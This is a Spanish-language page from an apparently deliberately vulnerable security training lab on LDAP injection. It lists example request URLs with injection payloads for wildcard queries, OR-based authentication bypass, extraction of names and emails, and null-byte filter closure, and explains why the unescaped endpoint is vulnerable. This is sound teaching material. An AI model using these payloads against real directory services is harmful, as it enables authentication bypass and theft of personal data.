Inyección en consultas LDAP para bypass de autenticación y acceso no autorizado
Modo Reto activo — explora libremente. Activa el Modo Tutorial si necesitas orientación.
Consulta LDAP legítima por nombre de usuario
/api/lab/ldap?filter=adminEl comodín * devuelve todas las entradas del directorio
/api/lab/ldap?filter=*Bypass de autenticación usando OR lógico LDAP
/api/lab/ldap?filter=*)(|(cn=*En login LDAP: usuario=admin, password=* (wildcard acepta cualquier valor)
/api/lab/ldap?filter=admin)(userPassword=*Extraer todos los nombres comunes del directorio
/api/lab/ldap?filter=*)(cn=*Extraer emails del directorio LDAP
/api/lab/ldap?filter=*)(mail=*Combinar condiciones AND para acceso forzado
/api/lab/ldap?filter=admin)(&(objectClass=*Inyectar cierre del paréntesis del filtro LDAP original
/api/lab/ldap?filter=admin))%00Este endpoint construye consultas LDAP concatenando entrada del usuario directamente. Un atacante puede manipular la consulta usando caracteres especiales como *, (, ), | para acceder a datos no autorizados o bypass de autenticación.
Esta aplicación es vulnerable por diseño - Solo para propósitos educativos
© 2025 Aitana Security Lab